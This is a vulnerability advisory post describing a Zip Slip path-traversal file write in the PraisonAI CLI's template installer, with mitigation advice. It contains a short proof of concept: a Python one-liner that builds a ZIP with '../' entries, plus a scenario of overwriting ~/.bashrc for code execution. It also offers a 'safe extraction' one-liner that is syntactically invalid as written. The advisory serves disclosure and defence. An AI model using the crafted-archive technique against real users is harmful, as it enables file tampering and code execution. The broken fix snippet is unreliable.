PraisonAI, Zip Slip Arbitrary File Write, (no CVE) (Critical)

Listen to this Post

How the mentioned CVE works (Zip Slip in PraisonAI templates installation):
The vulnerability exists because the CLI extracts untrusted ZIP archives using Python’s `zipfile.extractall(tmpdir)` without sanitizing member paths. A malicious ZIP file can contain entries with relative path traversal sequences like ../../../../tmp/evil.sh. When `extractall()` writes each file, it naively joins the destination directory with the entry’s filename. On older Python versions or permissive filesystems, this resolves to a location outside tmpdir, allowing an attacker to write arbitrary files anywhere the user has permissions. The vulnerable code is in `src/praisonai/praisonai/cli/features/templates.py` at line 852. During praisonai templates install github:attacker/malicious_template, the archive is fetched and extracted. The PoC uses z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned'). After extraction, the file appears in /tmp/. This arbitrary file write can overwrite system binaries, SSH keys, or application code. Combined with other vectors (e.g., cron jobs, library hijacking), it leads to remote code execution. The issue is a classic Zip Slip (CWE-22). No input validation or path resolution check is performed. Python’s `extractall()` is safe only when all paths are trusted. Here, community templates are external and untrusted. The impact is critical for any user installing a malicious template.

DailyCVE Form:

Platform: PraisonAI CLI
Version: All versions
Vulnerability: Zip Slip Write
Severity: Critical
Date: 7 Apr 2026

Prediction: Unknown patch date

What Undercode Say:

Generate malicious zip using Python one-liner
python3 -c "import zipfile; z=zipfile.ZipFile('evil.zip','w'); z.writestr('../../../../tmp/pwned','HACKED'); z.close()"
Simulate victim installing malicious template
praisonai templates install github:attacker/evil
Check for file outside target directory
ls -la /tmp/pwned
Safe extraction alternative using filter
python3 -c "import zipfile, os; z=zipfile.ZipFile('archive.zip'); for m in z.infolist(): n=os.path.normpath(m.filename); if n.startswith('..') or os.path.isabs(n): raise Exception('Zip slip detected'); z.extract(m, 'safe_dir')"

Exploit:

Attacker hosts a crafted ZIP on GitHub. Victim runs praisonai templates install github:attacker/malicious_template. The CLI downloads and extracts the ZIP. Files with `../` sequences land outside the temporary directory, e.g., overwriting `~/.bashrc` or /usr/bin/praisonai. Next time victim uses the CLI or logs in, arbitrary code executes.

Protection from this CVE:

  • Upgrade to patched PraisonAI version (if available).
  • Avoid installing templates from untrusted sources.
  • Apply fix: before extractall(), iterate `infolist()` and reject any entry where `os.path.normpath(entry.filename).startswith(‘..’)` or is absolute.
  • Use `zipfile.Path` (Python 3.8+) with safe extraction or `shutil.unpack_archive` with validation.
  • Run the CLI inside a sandbox (Docker, firejail) to limit filesystem damage.

Impact:

Arbitrary file write leading to full remote code execution, system corruption, privilege escalation, or data tampering. Any user installing a malicious community template is affected.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top